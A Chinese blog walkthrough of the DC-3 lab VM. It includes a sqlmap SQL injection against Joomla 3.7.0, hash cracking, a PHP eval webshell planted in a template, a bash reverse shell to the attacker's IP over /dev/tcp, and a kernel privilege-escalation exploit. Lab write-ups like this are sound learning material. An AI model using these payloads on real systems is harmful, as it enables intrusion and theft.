DC-3靶机渗透测试记录

已于 2023-02-12 10:41:47 修改
阅读量105 收藏
点赞数 1
分类专栏: DC靶机系列 文章标签: DC-3靶机 DC 3靶机 DC靶机 dc-3靶机 dc 3靶机
于 2023-01-30 11:42:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44605964/article/details/128799000
版权

靶机信息

靶机地址:https://www.five86.com/dc-3.html
下载完成后,运行文件夹中的.ova文件即可安装靶机(vmware)
网络连接方式为NAT,kali与靶机为同一网段

信息搜集

使用nmap探测网段,然后判断出靶机ip地址,对靶机进行扫描
只发现了80端口,joomla的网站

nmap -sn 192.168.32.0/24
nmap -A 192.168.32.131

在这里插入图片描述
访问80端口,这次只有一个flag
在这里插入图片描述
这里使用的是joomscan,kali上好像没有,需要先安装下
下载地址https://github.com/OWASP/joomscan

unzip joomscan-master.zip
cd joomscan-master

在安装目录中执行下列命令进行扫描,发现joomla版本为3.7.0,和后台路径

perl joomscan.pl
perl joomscan.pl -u 192.168.32.131

在这里插入图片描述

漏洞利用

在kali上使用searchsploit发现该版本存在sql注入的漏洞

searchsploit joomla | grep 3.7.0

在这里插入图片描述
然后去访问php/webapps/42033.txt文件,在漏洞文本里给我们提供了sqlmap的参数

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

在这里插入图片描述
使用sqlmap跑下,跑出来几个数据库名

sqlmap -u "http://192.168.32.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述
重点看joomladb库就可以了,发现有username和password字段

sqlmap -u "http://192.168.32.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --columns  -D "joomladb" -T "#__users"

在这里插入图片描述
看下字段里的内容

sqlmap -u "http://192.168.32.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --dump -D "joomladb" -T "#__users" -C "username,password"

在这里插入图片描述
将admin的密码hash写到一个txt文本中,使用工具john进行解密
得到加密类型为bcrypt,密码为snoopy
在这里插入图片描述
根据joomscan扫出来的管理界面/administrator
使用上面得到的账户密码admin/snoopy进行登录
在这里插入图片描述
在这里插入图片描述
然后找到模板,写入一句话

<?php @eval($_POST[cmd]);?>

在这里插入图片描述
在这里插入图片描述
然后使用webshell工具进行连接,连接路径为:
http://192.168.32.131/templates/protostar/html/test.php

连接上后发现没什么权限,但是有修改文件的权限,可以把我们的一句话改下弹到kali上方便操作

<?php
@eval($_POST[cmd]);
system("bash -c 'bash -i >& /dev/tcp/192.168.32.128/6666 0>&1'");
?>

在这里插入图片描述
kali开启监听后,浏览器访问test.php后连接成功
输入命令查看下系统版本,Ubuntu 16.04

nc -lvp 6666

在这里插入图片描述

权限提升

搜索系统版本相关漏洞
通过Linux Kernel 4.4.x (Ubuntu 16.04) - ‘double-fdput()’ bpf(BPF_PROG_LOAD) Privilege Escalation进行利用
在这里插入图片描述
查看该漏洞的文档,下载exp

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

在这里插入图片描述
下载好后通过蚁剑上传到/var/www/html下
在这里插入图片描述
在上传位置解压后,依次输入./compile.sh
和./doubleput,然后即可获取到root权限

tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput  
...
we have root privs now...

在这里插入图片描述
在root目录下找到flag
在这里插入图片描述

Jach1n
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试靶机DC-3
prettyX的博客
11-30 865
goGoGO!!! 今天我们做DC-3。 : ) 0X00 环境准备 靶机下载地址:http://www.five86.com 攻击机 :Kali 可能会问靶机导入情况,这里有个小插曲,我们下面再说... 0X01 开始渗透 局域网主机发现 nmap获取信息 发现只开放了80端口,我们尝试访问,但是显示页面错误,和其他大佬的wp也不一致,经过判断,应...
DC-1靶机渗透测试
weixin_45537612的博客
01-13 569
前奏:联网 自己刚安装的kali竟然没网,在花费了不少时间团团转后,用了下面的方法得以解决 出处: kali2020 永久性网络配置 (1)在VMware里打开kali linux和DC-1靶机 (2)打开终端通过su切换到root用户 (3)用ip add查看kali ip:192.168.153.129 (4)运用nmap扫描192.168.153.0/24以获取靶机IP 扫描出靶机 IP:192.168.153.130 用nmap -sV -p- 192.168.153.130扫描开放的端口
DC-5靶机渗透测试详细教程
啊醒的博客
05-04 7147
DC-5靶机渗透测试详细教程
DC-5靶机渗透测试过程(个人学习)
m0_59028058的博客
05-27 2040
访问thankyou.php,每次刷新网页会发现底部的时间也随之改变,但在其他网页刷新页面发现是一个静态页面,无论怎么刷新都并没有任何改变,猜测在thankyou.php文件中包含footer.php文件,存在着文件包含漏洞。它的日志会被记录在/var/log/nginx/error.log 或 /var/log/nginx/access.log。访问日志会发现我们写的一句话木马,中 '' 被编码,则需要在burp中抓包,在数据包中写入马上传。直接在url后面输入
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1405
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
DC-4靶机提权超详细过程
02-29
本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,读者可以学习到网络安全领域中权限提升的基本...
2021-8-11dc3靶机实战记录(磁盘配置不正确解决方案,joomla渗透学习,)
qq_45290991的博客
08-11 384
这个靶机有点意思,因为我之前从没见过java类的中间件站,所以也是从这一刻起我坚定了之后一定要学习java的决心。 谁料一进去就遇到难题: 百度之后得到解决方案: vmware报这个错: IDE 设备(磁盘/CD-ROM)配置不正确。“ide1:1”上具有一个 IDE 从设备,但没有主设备。此配置在虚拟机中无法正常运行。请使用配置编辑器将磁盘/CD-ROM 从“ide1:1”移到“ide1:0”。 原因就是我手溅把光驱给删除了,就一直报这个错! 解决方法: 选择具体的虚拟机,点 “虚拟机
DC-6渗透测试记录——超详细
m0_64312309的博客
09-12 145
本文是DC6靶机渗透测试的详细教程
程序设计竞赛题册生成.zip
09-11
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
海康威视SDK实例QtDemo显示NVR视频窗口(Linux+Qt)
09-11
在《海康威视客户端iVMS-4200连接NVR》 https://blog.csdn.net/chentuo2000/article/details/119298486 一文中我们通过海康威视客户端iVMS-4200连接NVR。 本文我们通过海康SDK连接NVR。
Proteus是英国Lab Center Electronics公司出版的EDA工具软件,是一款功能强大的电子电路仿真和物理特性
09-11
proteusProteus是英国Lab Center Electronics公司出版的EDA工具软件,是一款功能强大的电子电路仿真和物理特性模拟软件,广泛应用于电子工程师和教育者之间。以下是关于Proteus的详细介绍: 一、功能特点 原理图设计:Proteus提供了智能原理图设计功能,拥有丰富的器件库,包含超过27000种元器件,可方便地创建新元件,并通过模糊搜索快速定位所需器件。 电路仿真:该软件支持从原理图布图到代码调试,再到单片机与外围电路协同仿真的全过程。其混合仿真功能基于工业标准SPICE3F5,可实现数字/模拟电路的混合仿真,拥有超过27000个仿真器件,并可通过内部原型或使用厂家的SPICE文件自行设计仿真器件。 单片机协同仿真:Proteus支持多种主流 文心大模型3.5生成
springboot基于大数据的音乐数据可视化分析系统毕业论文.docx
最新发布
09-11
springboot基于大数据的音乐数据可视化分析系统毕业论文.docx
BAAlgorithmUtils-1.0.10-py3-none-any.whl
09-11
BAAlgorithmUtils-1.0.10-py3-none-any.whl
西安理工大学竞赛管理系统.zip
09-11
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
阿里天池竞赛.zip
09-11
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
Sigrity-SPEED2000 Examples 2.rar
09-11
Sigrity-SPEED2000 Examples 2.rar 欢迎来到SPEED2000示例2。本文档介绍了使用应用程序时可能遇到的各种场景的示例。本手册旨在通过提供现实生活中的示例和演示,简要介绍该应用程序,以便您了解SPEED2000的一些基本概念。 系统要求 请参阅安装指南以检查系统要求。 如何使用本指南 SPEED2000 examples 2提供了如何获得所需结果的演示示例和分步说明。 附加文件 除本文档外,请参阅以下文档以获取更多信息。 ■ .spd文件格式参考指南详细介绍了我们的原生.spd文件格式。 ■ 《SPEED2000入门指南》向您展示了如何开始使用SPEED2000中的功能。 ■ SPEED2000用户指南详细介绍了SPEED2000的特性和功能
基于ssm的基于web的特殊药品管理系统设计与实现.docx
09-11
基于ssm的基于web的特殊药品管理系统设计与实现.docx
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值